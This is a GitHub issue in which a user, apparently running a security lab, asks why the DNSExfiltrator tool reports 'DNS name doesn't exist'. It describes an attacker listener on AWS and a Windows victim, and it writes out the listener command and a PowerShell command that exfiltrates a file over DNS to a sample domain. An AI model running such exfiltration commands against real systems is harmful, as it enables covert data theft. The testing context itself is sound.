Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

DNS name doesn't exist issue #10

Open
beomjin210916 opened this issue Sep 6, 2023 · 0 comments
Open

DNS name doesn't exist issue #10

beomjin210916 opened this issue Sep 6, 2023 · 0 comments

Comments

@beomjin210916
Copy link

Hi, I am really appreciate that you create such tools so that I could test DNS security.
I have downloaded this file and have kind of issue.

I also have seen of same issue in this github page.

However, I really don't know how to solve this.

Here is my environment:

  1. My attacking environment kali is on AWS EC2.
  2. I use route 53 to manage my domain abc.shop(abc.shop is sample)
  3. so my NS records should be "ns-xxx.awsdns-xxx.com" something like this
  4. I connect my domain abc.shop to my kali 53.x.x.x
  5. I used "python2 dnsexfiltrator.py -d abc.shop -p password" on my kali(53.x.x.x) It can be on listening status.
  6. My victim machine is window and it is on my exsi server (172.X.X.X)
  7. I have used such command on window powershell. "Invoke-DNSExfiltrator -i secret.jpg -d abc.shop -p password" and it says DNS name doesn't exist.

My question is this:
Did I configure something wrong?
Do I have to own a Name server of NS record? (because I don't own the name server but AWS own it)
Thank you for your effort,
Best regards.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant